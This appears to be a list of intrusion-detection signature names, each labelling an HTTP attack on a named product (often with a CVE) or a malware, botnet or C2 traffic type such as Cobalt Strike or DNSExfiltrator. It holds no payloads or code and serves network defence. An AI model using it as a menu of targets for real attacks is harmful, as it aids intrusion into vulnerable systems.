HTTP_CRL-Apache-Struts-Rest-Plugin-DMI-Code-Execution
HTTP_CRL-Apache-Struts-Urlvalidator-Denial-Of-Service
HTTP_CRL-Apache-Struts-Xsltresult-File-Inclusion
HTTP_CRL-Apache-Superset-Markdown-Component-Stored-Cross-Site-Scripting
HTTP_CRL-Apache-Superset-Url-Shortener-Open-Redirect
HTTP_CRL-Apache-Tapestry-Classpathassetrequesthandler-Information-Disclosure
HTTP_CRL-Apache-Tomcat-Directory-Listing-Information-Disclosure
HTTP_CRL-Apache-Tomcat-HTTP2-Denial-of-Service
HTTP_CRL-Apache-Tomcat-Maxparametercount-Denial-Of-Service
HTTP_CRL-Apache-Tomcat-User-Enumeration
HTTP_CRL-Apache-Traffic-Control-Deliveryservice_Request_Comments-SQL-Injection
HTTP_CRL-Apache-Unomi-CVE-2020-13942-RCE
HTTP_CRL-Apache-Win32-Pipe-Metacharacter-Attack
HTTP_CRL-Apache-Zeppelin-WebsocketEventFactory-Stored-Cross-Site-Scripting
HTTP_CRL-Appsmith-RCE-CVE-2024-55964
HTTP_CRL-ARCserve-D2D-Getnews-External-Entity-Injection
HTTP_CRL-Arcserve-Unified-Data-Protection-Directory-Traversal
HTTP_CRL-ARMBot-Botnet
HTTP_CRL-Arris-TR3300-Command-Injection-CVE-2022-27002
HTTP_CRL-Arris-VAP2500-Management-Portal-Command-Execution
HTTP_CRL-Artica-Proxy-Cyrus.php-Command-Injection
HTTP_CRL-ASePortal-Parameter-SQL-Injection
HTTP_CRL-Asus-RT-AC3200-Command-Injection
HTTP_CRL-Atlassian-Bitbucket-Server-And-Data-Center-Command-Injection
HTTP_CRL-Atlassian-Bitbucket-Server-And-Data-Center-CVE-2022-43781-Command-Injection
HTTP_CRL-Atlassian-Crowd-pdkinstall-CVE-2019-11580-1
HTTP_CRL-Atlassian-Crowd-pdkinstall-CVE-2019-11580-2
HTTP_CRL-Atlassian-JIRA-Server-And-Data-Center-Issue-Collector-Reflected-Cross-Site-Scripting
HTTP_CRL-Atlassian-JIRA-Server-And-Data-Center-Mobile-Plugin-Server-Side-Request-Forgery
HTTP_CRL-Atlassian-Remote-File-Access
HTTP_CRL-Atmosphere-Framework-Reflected-Cross-Site-Scripting
HTTP_CRL-ATutor-SQL-Injection
HTTP_CRL-Avaya-IP-Office-Customer-Call-Reporter-Unrestricted-File-Upload
HTTP_CRL-Aviatrix-Controller-Command-Injection-CVE-2024-50603
HTTP_CRL-Aviatrix-Controller-File-Upload-CVE-2021-40870
HTTP_CRL-Avideo-WWBNIndex-Plugin-Unauthenticated-RCE
HTTP_CRL-Avtech-IP-Camera-AVM1203-Command-Injection-CVE-2024-7029
HTTP_CRL-Avtech-IP-Camera-Multiple-Command-Injection-Vulnerabilities
HTTP_CRL-Awstats-Configdir-Parameter-System-Compromise-2
HTTP_CRL-Awstats-Logfile-Parameter-Command-Execution-2
HTTP_CRL-Backdoor-ENM-Detected
HTTP_CRL-Bagle-Spambot
HTTP_CRL-Banker-Trojan-Keylogger
HTTP_CRL-Barco-WePresent-File_transfer.cgi-Command-Injection
HTTP_CRL-Bash-Shellshock-Code-Injection
HTTP_CRL-Bea-AquaLogic-Cross-Site-Scripting-CVE-2008-0867
HTTP_CRL-Beck-Ipc-Chip-HTTP-Denial-Of-Service
HTTP_CRL-Beyondtrust-Remote-Support-Cross-Site-Scripting-CVE-2021-31589
HTTP_CRL-BillQuick-Web-Suite-SQL-Injection-CVE-2021-42258
HTTP_CRL-Blackenergy-Bot-Traffic
HTTP_CRL-Blazefind
HTTP_CRL-Bludit-Directory-Traversal-Image-File-Upload
HTTP_CRL-Bnbform-Hidden-Field-Manipulation
HTTP_CRL-Borland-Accurev-Savecontentserviceimpl-Servlet-Directory-Traversal
HTTP_CRL-Brocade-Network-Advisor-Climonitorreportservlet-Filename-Directory-Traversal
HTTP_CRL-BYOB-Arbitrary-File-Write-And-Command-Injection
HTTP_CRL-CA-Total-Defense-Suite-SQL-Injection-Vulnerability
HTTP_CRL-CA-Total-Defense-Suite-UNCWS-UnassignFunctionalRoles-SQL-Injection
HTTP_CRL-CA-Unified-Infrastructure-Management-Download_lar.Jsp-Directory-Traversal
HTTP_CRL-CA-XOsoft-Products-Xosoapapi-Buffer-Overflow
HTTP_CRL-CachetHQ-Cachet-Createincidentcommandhandler-Template-Injection
HTTP_CRL-Cacti-Build_Graph_Object_SQL_Having-SQL-Injection
HTTP_CRL-Cacti-Group-Cacti-Automation-Graph-And-Tree-Rules-Name-Stored-XSS
HTTP_CRL-Cacti-Group-Cacti-Color.php-SQL-Injection
HTTP_CRL-Cacti-Group-Cacti-Graphs.php-SQL-Injection
HTTP_CRL-Cacti-Group-Cacti-Installer-Setpaths-Log-Path-Arbitrary-File-Write
HTTP_CRL-Cacti-Group-Cacti-Managers-SQL-Injection
HTTP_CRL-Cacti-Group-Cacti-poller_automation.php-Command-Injection
HTTP_CRL-Cacti-Group-Cacti-poller_Host_Duplicate-SQL-Injection
HTTP_CRL-Cacti-Group-Cacti-Remote_Agent-Command-Injection
HTTP_CRL-Cacti-Group-Cacti-Rrdtool-Crlf-Injection
HTTP_CRL-Cacti-Group-Cacti-SNMP_Escape_String-Command-Injection
HTTP_CRL-Cacti-Group-Cacti-SQL_Save-SQL-Injection
HTTP_CRL-Cacti-Host_Templates-Template-SQL-Injection-CVE-2024-54146
HTTP_CRL-Cacti-Links.php-Console-Section-Name-Stored-Cross-Site-Scripting
HTTP_CRL-Cacti-Links.php-Fileurl-Stored-Cross-Site-Scripting
HTTP_CRL-Cacti-Links.php-Title-Stored-Cross-Site-Scripting
HTTP_CRL-Cacti-poller_Standard-Error-Log-Path-Arbitrary-File-Read-CVE-2024-45598
HTTP_CRL-Cacti-Spikekill-Cross-Site-Scripting
HTTP_CRL-Calibre-Python-Code-Injection-CVE-2024-6782
HTTP_CRL-Cambium-ePMP-1000-Ping-Command-Injection
HTTP_CRL-Campcodes-Thesis-Archiving-System-SQL-Injection-CVE-2023-2149
HTTP_CRL-Carberp-Botnet
HTTP_CRL-Carberp-Botnet-Traffic-Detected
HTTP_CRL-Carberp-Web-Panel-Remote-Code-Execution
HTTP_CRL-Carel-PlantVisor-Directory-Traversal
HTTP_CRL-Cayin-CMS-NTP-Server-RCE
HTTP_CRL-Cayin-xPost-wayfinder_seqid-SQLi
HTTP_CRL-CentOS-Web-Panel-7-Remote-Code-Execution-CVE-2022-44877
HTTP_CRL-CentOS-Web-Panel-Command-Injection-CVE-2018-18322
HTTP_CRL-Centreon-centreonAuth-Command-Injection
HTTP_CRL-Centreon-CSV_hostgrouplogs-SQL-Injection
HTTP_CRL-Centreon-Generateimage-Index-SQL-Injection
HTTP_CRL-Centreon-Graph-Split-Chartid-SQL-Injection
HTTP_CRL-Centreon-Hostgroupdependency-dep_Id-SQL-Injection
HTTP_CRL-Centreon-Knowledgebase-Proxy-Proceduresproxy-SQL-Injection
HTTP_CRL-Centreon-Metaservice-Meta_Id-SQL-Injection
HTTP_CRL-Centreon-Nagios-Path-Command-Injection
HTTP_CRL-Centreon-poller-Remote-Command-Execution
HTTP_CRL-Centreon-RRDdatabase_Status_Path-Command-Injection
HTTP_CRL-Centreon-Web-Centreongraph-Initcurvelist-SQL-Injection
HTTP_CRL-Centreon-Web-Formcontactgroup-SQL-Injection
HTTP_CRL-Centreon-Web-Insertgraphtemplate-SQL-Injection
HTTP_CRL-Centreon-Web-Managevmetric-SQL-Injection
HTTP_CRL-Centreon-Web-poller-Broker-Disablcentreonbrokerindb-SQL-Injection
HTTP_CRL-Centreon-Web-poller-Broker-Enablecentreonbrokerindb-SQL-Injection
HTTP_CRL-Centreon-Web-poller-Broker-Insertconfig-SQL-Injection
HTTP_CRL-Centreon-Web-poller-Resource-SQL-Injection
HTTP_CRL-Centreon-Web-Updatecontactservicecommands-SQL-Injection
HTTP_CRL-Centreon-Web-Updatedirectory-SQL-Injection
HTTP_CRL-Centreon-Web-Updatelcarelation-SQL-Injection
HTTP_CRL-Centreon-Web-Updateservicehost-SQL-Injection
HTTP_CRL-Centreon-Web-Updateservicehost_MC-SQL-Injection
HTTP_CRL-Cgi-Bizdb1-Search-Dbname-Usage
HTTP_CRL-CGIWrap-JavaScript-Execution-Attempt
HTTP_CRL-Chaos-RAT-XSS-To-RCE
HTTP_CRL-Chetcpasswd-Buffer-Overflow
HTTP_CRL-Chipmunk-Forums-SQL-Injection
HTTP_CRL-CirceOS-SaveWeb-Poll-Remote-Code-Injection-Compromise
HTTP_CRL-CirceOS-SaveWeb-Poll-Remote-Code-Injection-Compromise-2
HTTP_CRL-CirceOS-SaveWeb-Site-Path-Remote-Code-Injection-Compromise
HTTP_CRL-Cisco-Adaptive-Security-Appliance-Cross-Site-Scripting-CVE-2020-3580
HTTP_CRL-Cisco-ASA-Line-Runner-Malware-Shellcode-Interaction-CVE-2024-20359
HTTP_CRL-Cisco-Data-Center-Network-Manager-Deletereporttemplate-Arbitrary-File-Deletion
HTTP_CRL-Cisco-Data-Center-Network-Manager-Getrestorelog-Directory-Traversal
HTTP_CRL-Cisco-Data-Center-Network-Manager-Getswitchsdatalength-SQL-Injection
HTTP_CRL-Cisco-Data-Center-Network-Manager-Gettokeninfo-SQL-Injection
HTTP_CRL-Cisco-Data-Center-Network-Manager-Installswitchlicense-Directory-Traversal
HTTP_CRL-Cisco-Data-Center-Network-Manager-Persistuserinfo-SQL-Injection
HTTP_CRL-Cisco-Data-Center-Network-Manager-Savelicensefiletoserver-Directory-Traversal
HTTP_CRL-Cisco-Data-Center-Network-Manager-Savezoneinputfiletoserver-Directory-Traversal
HTTP_CRL-Cisco-Data-Center-Network-Manager-Securitymanager-Authentication-Bypass
HTTP_CRL-Cisco-Data-Center-Network-Manager-Storefilecontentinfs-Directory-Traversal
HTTP_CRL-Cisco-Hyperflex-Hx-Auth-Handling-Remote-Command-Execution
HTTP_CRL-Cisco-Hyperflex-Hx-Storfs-asup-Handling-Remote-Command-Execution
HTTP_CRL-Cisco-IOS-HTTP-Server-Cross-Site-Scripting
HTTP_CRL-Cisco-IOS-XE-Webui-Command-Injection
HTTP_CRL-Cisco-IOS-XE-Webui-Command-Injection-CVE-2019-12650
HTTP_CRL-Cisco-IOS-XE-Webui-Command-Injection-CVE-2019-12651
HTTP_CRL-Cisco-Network-Registrar-Default-Credentials-Authentication-Bypass
HTTP_CRL-Cisco-Nexus-Dashboard-Fabric-Controller-Amf-Insecure-Deserialization
HTTP_CRL-Cisco-Prime-Collaboration-Provisioning-Licensestatus-Arbitrary-File-Deletion
HTTP_CRL-Cisco-Prime-Collaboration-Provisioning-Logconfigtracer.jsp-Directory-Traversal
HTTP_CRL-Cisco-Prime-Data-Center-Network-Manager-Downloadservlet-Information-Disclosure
HTTP_CRL-Cisco-Prime-Data-Center-Network-Manager-Processimagesave.jsp-Arbitrary-File-Upload
HTTP_CRL-Cisco-Prime-Infrastructure-And-Dcnm-Xmpfileuploadservlet-Directory-Traversal
HTTP_CRL-Cisco-Prime-Infrastructure-And-Epnm-Dashboardrenderer-XML-External-Entity-Injection
HTTP_CRL-Cisco-Prime-Infrastructure-And-Epnm-Systempreferences_configurable-Cross-Site-Scripting
HTTP_CRL-Cisco-Prime-Network-Analysis-Module-Graph-Sfile-Directory-Traversal
HTTP_CRL-Cisco-Router-Management-Interface-RCE
HTTP_CRL-Cisco-RV-Series-Router-Remote-Code-Execution-CVE-2022-20699
HTTP_CRL-Cisco-RV320-And-RV325-Information-Disclosure-CVE-2019-1653
HTTP_CRL-Cisco-RV320-And-RV325-Remote-Code-Execution-CVE-2019-1652
HTTP_CRL-Cisco-SA520W-Security-Appliance-Directory-Traversal
HTTP_CRL-Cisco-SD-WAN-Solution-Vmanage-SQL-Injection
HTTP_CRL-Cisco-Secure-Access-Control-Server-UCP-Application-CSuserCGI.exe-BOF
HTTP_CRL-Cisco-Secure-ACS-Unauthorized-Password-Change
HTTP_CRL-Cisco-Secure-ACS-Web-Management-Interface-Buffer-Overflow
HTTP_CRL-Cisco-Security-Manager-Authtokenservlet-Insecure-Deserialization
HTTP_CRL-Cisco-Security-Manager-Ctmservlet-Insecure-Deserialization
HTTP_CRL-Cisco-Security-Manager-Secretservice.jsp-Insecure-Deserialization
HTTP_CRL-Cisco-UCS-Director-Downloadfile-Directory-Traversal
HTTP_CRL-Cisco-UCS-Director-Savestaticconfig-Directory-Traversal
HTTP_CRL-Cisco-UCS-Director-Savewindowsnetworkconfig-Directory-Traversal
HTTP_CRL-Cisco-UCS-Director-Scriptmoduleaddjarpage-Directory-Traversal
HTTP_CRL-Cisco-UCS-Director-Unauthenticated-RCE
HTTP_CRL-Cisco-Unified-Communications-Manager-Multiple-SQL-Injections
HTTP_CRL-Citrix-Access-Gateway-Command-Execution
HTTP_CRL-Citrix-Authorization-Bypass-CVE-2020-8193
HTTP_CRL-Citrix-Code-Injection-CVE-2020-8194
HTTP_CRL-Citrix-Code-Injection-CVE-2023-3519
HTTP_CRL-Citrix-Cross-Site-Scripting-CVE-2020-8191
HTTP_CRL-Citrix-Forced-New-nsroot-Session
HTTP_CRL-Citrix-Path-Traversal-CVE-2019-19781
HTTP_CRL-Citrix-SD-WAN-Command-Injection-CVE-2019-12991
HTTP_CRL-Citrix-SD-WAN-SQL-Injection-CVE-2019-12989
HTTP_CRL-Citrix-ShareFile-Storage-Zones-Controller-Neatupload-Directory-Traversal
HTTP_CRL-Citrix-ShareFile-Storage-Zones-Controller-Processrawpostedfile-Directory-Traversal
HTTP_CRL-Citrix-XenApp-Xendesktop-Xml-Service-Interface-Uninitialized-Pointer
HTTP_CRL-Clowncryptor-Infection-Traffic
HTTP_CRL-CMS-Made-Simple-Login.php-Remote-Password-Reset-Vulnerability
HTTP_CRL-CMS-Made-Simple-Smarty-Serverside-Template-Injection
HTTP_CRL-Cobalt-Strike-C2-HTTP-Traffic
HTTP_CRL-Cockpit-CMS-NoSQLi-To-RCE
HTTP_CRL-Code-Red-II-Worm-Attack
HTTP_CRL-Code-Red-Worm-Attack
HTTP_CRL-Cogent-Datahub-Web-Server-Getpermissions.asp-Command-Injection
HTTP_CRL-Commvault-Commcell-Downloadcenteruploadhandler-Arbitrary-File-Upload
HTTP_CRL-Confluence-Access-Control-Vulnerability-CVE-2023-22515
HTTP_CRL-Confluence-Hardcoded-Credentials-CVE-2022-26138
HTTP_CRL-Confluence-OGNL-Injection-CVE-2021-26084
HTTP_CRL-Confluence-Path-Traversal-CVE-2019-3398
HTTP_CRL-Confluence-Remote-Code-Execution-CVE-2019-3396
HTTP_CRL-Confluence-Template-Injection-CVE-2023-22527
HTTP_CRL-Connectwise-Screenconnect-Authentication-Bypass-CVE-2024-1709-New-Account
HTTP_CRL-ContentKeeper-Web-Remote-Command-Execution
HTTP_CRL-Cookie-Command-Execute
HTTP_CRL-Coppermine-Photo-Gallery-picEditor.php-Command-Execution
HTTP_CRL-CPanel-Errorpage-Webcall-Id-Reflected-Cross-Site-Scripting
HTTP_CRL-CPanel-Multiple-Cross-Site-Scripting-Vulnerabilities
HTTP_CRL-Craft-CMS-Unauthenticated-Remote-Code-Execution
HTTP_CRL-Cross-Site-Script-Encoder
HTTP_CRL-CrushFTP-Improper-Modification-Of-Object-Attributes-CVE-2023-43177
HTTP_CRL-CrushFTP-Server-Side-Template-Injection-CVE-2024-4040
HTTP_CRL-CryptoWall-Botnet-Traffic
HTTP_CRL-Crypttech-CryptoLog-Remote-Code-Execution
HTTP_CRL-Ctek-SkyRouter-Command-Execution
HTTP_CRL-Cyberpanel-Remote-Code-Execution-Via-completePath-Parameter-CVE-2024-51568
HTTP_CRL-Cyclope-Employee-Surveillance-Solution-SQL-Injection
HTTP_CRL-D-Link-Central-WiFiManager-SQL-Injection
HTTP_CRL-D-Link-Command-Injection-CVE-2019-16920
HTTP_CRL-D-Link-D-View-Executewmiccmd-Command-Injection
HTTP_CRL-D-Link-DCS-930L-Command-Execution-CVE-2016-11021
HTTP_CRL-D-Link-DCS-931L-File-Upload
HTTP_CRL-D-Link-ddns_check-Remote-Command-Execution-CVE-2021-45382
HTTP_CRL-D-Link-Devices-UPnP-Soap-Command-Execution
HTTP_CRL-D-Link-DIR-2640-HNAP-EmailFrom-Command-Injection-Vulnerability
HTTP_CRL-D-Link-Dir-605-Information-Disclosure-CVE-2021-40655
HTTP_CRL-D-Link-DIR-615-Authentication-Bypass
HTTP_CRL-D-Link-DIR-816L-Getcfg.php-Information-Disclosure
HTTP_CRL-D-Link-DIR-820L-Remote-Code-Execution-Vulnerability-CVE-2022-26258
HTTP_CRL-D-Link-DIR-850L-Command-Execution
HTTP_CRL-D-Link-DIR-859-Path-Traversal-CVE-2024-0769
HTTP_CRL-D-Link-DIR816L-Moobot-Remote-Code-Execution-Attempt
HTTP_CRL-D-Link-DNS-320-Remote-Code-Execution-CVE-2020-25506
HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Code-Execution
HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service
HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service-2
HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service-3
HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service-4
HTTP_CRL-D-Link-DnsProxy-Cross-Site-Scripting
HTTP_CRL-D-Link-DSL-2760U-Cross-Site-Scripting
HTTP_CRL-D-Link-NAS-Appliance-Command-Injection
HTTP_CRL-D-Link-soap.cgi-Command-Injection-CVE-2018-6530
HTTP_CRL-D-Link-TRENDnet-NCC-Service-Command-Injection
HTTP_CRL-D-Link-Unauthenticated-Remote-Command-Execution
HTTP_CRL-D-Link-WBR-1310-Authentication-Bypass
HTTP_CRL-D-Link-Wireless-Router-Captcha-Data-Processing-Buffer-Overflow
HTTP_CRL-Dahua-IP-Camera-Loopback-Authentication-Bypass-CVE-2021-33045
HTTP_CRL-Dahua-IP-Camera-NetKeyboard-Authentication-Bypass-CVE-2021-33044
HTTP_CRL-Dapato-Traffic
HTTP_CRL-Dasan-GPON-Router-Command-Injection
HTTP_CRL-Dasan-GPON-Routers-Authentication-Bypass-CVE-2018-10561
HTTP_CRL-DataLife-Engine-PHP-Code-Injection
HTTP_CRL-DC/OS-Marathon-UI-Docker-Exploit
HTTP_CRL-Ddoser-Bot-Traffic
HTTP_CRL-Dell-EMC-Vmax-Virtual-Appliance-Manager-Authentication-Bypass
HTTP_CRL-Dell-Scriptlogic-Asset-Manager-Getprocessedpackage-SQL-Injection
HTTP_CRL-Dell-SonicWall-Universal-Management-Suite-Imagepreviewservlet-SQL-Injection
HTTP_CRL-Delta-Electronics-Infrasuite-Device-Master-Gextrainfo-Insecure-Deserialization
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Am_Handler-TP-SQL-Injection
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Astlistparameters-SQL-Injection
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Checkiothubnameexisted-SQL-Injection
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-CVE-2022-41133-SQL-Injection
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Diae_Phandler-Getobject-SQL-Injection
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Diae_taghandler.ashx-SQL-Injection
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Dmdsethandler-Order_By-SQL-Injection
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Ftyinfosetting-SQL-Injection
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-GetDIAE_sloglistparameters-SQL-Injection
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-GetDIAE_unListParameters-SQL-Injection
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handleralarmgroup-SQL-Injection
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handleralarmgroup-Stored-Cross-Site-Scripting
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handlerenergytype.aspx-SQL-Injection
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handlerpagep_Kid-SQL-Injection
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handler_Cfg-SQL-Injection
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Hierarchyhandler-Stored-Cross-Site-Scripting
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Insertreg-Stored-Cross-Site-Scripting
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Putlinemessagesetting-Stored-XSS
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Putshift-Stored-Cross-Site-Scripting
HTTP_CRL-Delta-Industrial-Automation-Diaenergie-SQL-Injection-CVE-2024-28891
HTTP_CRL-Delta-Industrial-Automation-Dialink-Schedule-Stored-Cross-Site-Scripting
HTTP_CRL-DenyAll-Web-Application-Firewall-Remote-Code-Execution
HTTP_CRL-DiamondFox-Traffic
HTTP_CRL-Digiever-DS2105-Pro-Remote-Code-Execution
HTTP_CRL-Digital-Watchdog-Dw-Megapix-Command-Injection-CVE-2022-34538
HTTP_CRL-Directory-Php-Vulnerability-Access
HTTP_CRL-Dirtjumper-Traffic
HTTP_CRL-Disk-Pulse-Enterprise-Server-Login-Request-Buffer-Overflow
HTTP_CRL-Django-QuerySet-Order_By-SQL-Injection
HTTP_CRL-Django-Trunc-And-Extract-SQL-Injection
HTTP_CRL-Django-Urlize-Urlizetrunc-Denial-Of-Service
HTTP_CRL-Django-Usernamefield-Denial-Of-Service
HTTP_CRL-Django-Wordwrap-Filter-Denial-Of-Service-CVE-2025-26699
HTTP_CRL-dnaLIMS-Admin-Module-Command-Execution
HTTP_CRL-dnaLIMS-Directory-Traversal
HTTP_CRL-DNSExfiltrator-Traffic-Over-HTTPS
HTTP_CRL-Docker-Daemon-Unprotected-TCP-Socket-Exploit
HTTP_CRL-Dogfood-CRM-Remote-Command-Execution
HTTP_CRL-Dolibarr-16-Pre-Auth-Contact-Database-Dump
HTTP_CRL-Dolibarr-ERP-And-CRM-Card.php-Reflected-Cross-Site-Scripting
HTTP_CRL-Dolibarr-ERP-And-CRM-Database-Backup-Command-Injection
HTTP_CRL-Dolibarr-ERP-And-CRM-Edit.php-Code-Injection
HTTP_CRL-Dolibarr-ERP-And-CRM-Suite-Menu-Editor-Dol_Eval-Code-Injection
HTTP_CRL-Dolibarr-ERP-And-CRM-Suite-Website-Command-Injection
HTTP_CRL-Dolibarr-ERP-CRM-Command-Injection
HTTP_CRL-Dolibarr-ERP-Group-Stored-Cross-Site-Scripting
HTTP_CRL-Donbot-Bot-Activity-Detected
HTTP_CRL-Downloader-Malware-Infection-Traffic
HTTP_CRL-DrayTek-Vigor-Web-Management-Page-keyPath-Command-Injection
HTTP_CRL-Drupal-Core-Database-Expandarguments-SQL-Injection
HTTP_CRL-Drupal-Core-Database-Expandarguments-SQL-Injection-2
HTTP_CRL-Drupal-Core-Database-Expandarguments-SQL-Injection-3
HTTP_CRL-Drupal-Core-Form-Rendering-Remote-Code-Execution
HTTP_CRL-Drupal-Core-Form-Rendering-Remote-Code-Execution-2
HTTP_CRL-Drupal-Core-Phar-Stream-Wrapper-Insecure-Deserialization
HTTP_CRL-Drupal-Core-System.Temporary-Information-Disclosure
HTTP_CRL-Drupal-Core-Web-Services-Remote-Code-Execution-CVE-2019-6340
HTTP_CRL-Drupal-Drupalgeddon-2-Forms-API-Property-Injection
HTTP_CRL-Drupalgeddon2-Post-Parameter
HTTP_CRL-Dsielercha-Trojan
HTTP_CRL-Dup-Scout-Enterprise-Login-Buffer-Overflow
HTTP_CRL-e107-Contact-Php-Remote-Code-Execution
HTTP_CRL-e107-Contact-Php-Remote-Code-Execution-2
HTTP_CRL-Easy-Chat-Server-User-Registeration-Buffer-Overflow
HTTP_CRL-Easy-Chat-Server-Username-Buffer-Overflow
HTTP_CRL-Easydynamicpages-Config-Php-System-Compromise
HTTP_CRL-Eaton-Intelligent-Power-Management-CVE-2021-23282-Stored-Cross-Site-Scripting
HTTP_CRL-Eaton-Intelligent-Power-Management-Meta_Driver_Srv-Savedriverdata-Arbitrary-File-Deletion
HTTP_CRL-Eaton-IPM-Removebackground-Removefirmware-Arbitrary-File-Deletion
HTTP_CRL-Eaton-Network-Shutdown-Module-Remote-Code-Execution
HTTP_CRL-ECart-Index-Cgi-Art-Parameter-Command-Execution
HTTP_CRL-Ecava-IntegraXOR-SCADA-Information-Leak
HTTP_CRL-Edimax-IC-7100-IP-Camera-OS-Command-Injection-CVE-2025-1316
HTTP_CRL-EFS-Software-Easy-File-Sharing-Web-Server-sendemail.ghp-Stack-Buffer-Overflow
HTTP_CRL-EFS-Software-Easy-File-Sharing-Web-Server-Userid-Buffer-Overflow
HTTP_CRL-Ekeoil-Malware-C2-Traffic
HTTP_CRL-Ektron-CMS-XSLT-Transform-Remote-Code-Execution
HTTP_CRL-Elastic-Kibana-Timelion-Prototype-Pollution
HTTP_CRL-ElasticSearch-Memory-Disclosure
HTTP_CRL-ElasticSearch-Search-Groovy-Sandbox-Bypass
HTTP_CRL-Electro-Infection-Traffic
HTTP_CRL-Elog-Project-Elog-Show_Uploader_JSON-Null-Pointer-Dereference
HTTP_CRL-EMC-Cmcne-Inmservlets-Bootfileuploadmoreinfoservlet-Directory-Traversal
HTTP_CRL-Emumail-Cgi-Cross-Site
HTTP_CRL-Enalean-Tuleap-Remote-PHP-Code-Injection-Vulnerability
HTTP_CRL-Endian-Firewall-Proxy-Password-Change-Command-Execution
HTTP_CRL-Enigma2-Webinterface-Remote-Root-File-Disclosure
HTTP_CRL-Es-File-Explorer-Open-Port
HTTP_CRL-Esf-Pfsense-Diag_Logs_Filter-Multiple-Cross-Site-Scripting-Vulnerabilities
HTTP_CRL-Esf-Pfsense-Firewall_Shaper-Cross-Site-Scripting
HTTP_CRL-Esf-Pfsense-Services_unbound_acls-Cross-Site-Scripting
HTTP_CRL-Esf-Pfsense-Status_captiveportal-Cross-Site-Scripting
HTTP_CRL-Esf-Pfsense-Status_RRD_Graph_img.php-Command-Injection
HTTP_CRL-Esf-Pfsense-Webgui-Deletefile-Directory-Traversal
HTTP_CRL-eTrust-SiteMinder-SQL-Injection-CVE-2005-2204
HTTP_CRL-Excessively-Long-Copy-Request-Argument
HTTP_CRL-Excessively-Long-Options-Request-Argument
HTTP_CRL-Excessively-Long-Propfind-Request-Argument
HTTP_CRL-Excessively-Long-Proppatch-Request-Argument
HTTP_CRL-Exponent-CMS-Eaascontroller-API-Function-SQL-Injection
HTTP_CRL-eXtropia-Webstore-Command-Execution
HTTP_CRL-EyesOfNetwork-Autodiscovery-Target-Command-Execution-CVE-2020-8654
HTTP_CRL-EyesOfNetwork-Username-SQL-Injection-CVE-2020-8656
HTTP_CRL-Ezcontents-Globals-Php-Code-Injection
HTTP_CRL-Ezcontents-Module-Php-Link-System-Compromise
HTTP_CRL-F5-Big-IP-And-Big-IQ-iControl-iControlportal.cgi-Format-String-Vulnerability
HTTP_CRL-F5-Big-IP-Dbquery.jsp-SQL-Injection
HTTP_CRL-F5-Big-IP-Next-Central-Manager-Validateuserincm-OData-Injection
HTTP_CRL-F5-iControl-Rest-Unauthenticated-RCE-CVE-2021-22986
HTTP_CRL-F5-iControl-Rest-Unauthenticated-RCE-CVE-2022-1388
HTTP_CRL-F5-Networks-Big-IP-iControl-Privilege-Escalation
HTTP_CRL-F5-Networks-Big-IP-TMUI-Directory-Traversal-CVE-2020-5902
HTTP_CRL-FakeInst.BL-Traffic
HTTP_CRL-Falcon-One-Error-Page-Remote-File-Inclusion
HTTP_CRL-Fancy-Product-Designer-Plugin-For-Wordpress-Unauthenticated-SQL-Injection
HTTP_CRL-FBCIndex-Access
HTTP_CRL-Flame-Skywiper-Possible-POST-Request-To-CnC
HTTP_CRL-Flarum-Core-Cross-Site-Scripting
HTTP_CRL-FlexDotnetCMS-Arbitrary-Asp-File-Upload
HTTP_CRL-Flexense-Vx-Search-Enterprise-Add_Command-Buffer-Overflow
HTTP_CRL-FLIR-AX8-Unauthenticated-RCE
HTTP_CRL-Fluent-Bit-Memory-Corruption-CVE-2024-4323
HTTP_CRL-ForgeRock-Access-Management-And-OpenAM-Jato-Insecure-Deserialization
HTTP_CRL-FormMail-Command-Execution
HTTP_CRL-Fortinet-FortiOS-Authorization-Bypass
HTTP_CRL-Fortinet-FortiOS-Path-Traversal-CVE-2018-13379
HTTP_CRL-Fortinet-Fortiweb-OS-Command-Injection
HTTP_CRL-Fortinet-Multiple-Products-Certificate-Import-Format-String-CVE-2024-45324
HTTP_CRL-FortiOS-And-FortiProxy-SSLVPN-Heap-Buffer-Overflow-CVE-2023-27997
HTTP_CRL-Fortra-FileCatalyst-Workflow-SQL-Injection-CVE-2024-5276
HTTP_CRL-Four-Faith-Routers-F3x24-F3x36-Remote-Command-Injection-CVE-2024-12856
HTTP_CRL-Foxit-Reader-Insecure-Library-Loading
HTTP_CRL-FreePBX-Framework-Hotelwakeup-Module-Directory-Traversal
HTTP_CRL-FreePBX-Framework-Module-Config.php-Code-Execution
HTTP_CRL-FreePBX-Framework-Modulefunctions-Display-SQL-Injection
HTTP_CRL-FreePBX-Framework-Recordings-Module-Remote-Command-Execution
HTTP_CRL-FreePBX-Remotemod-Remote-Command-Execution
HTTP_CRL-Froxlor-Log-Path-RCE
HTTP_CRL-FTGate4-Buffer-Overflow-Vulnerability
HTTP_CRL-FtpLocate-Command-Execution
HTTP_CRL-Fuel-CMS-SQL-Injection-CVE-2020-17463
HTTP_CRL-Fujitsu-Siemens-ServerView-Command-Execution-CVE-2007-3011
HTTP_CRL-FusionPBX-Command-Exec.php-Command-Execution
HTTP_CRL-FXC-AE1021PE-Router-Command-Injection-CVE-2023-49897
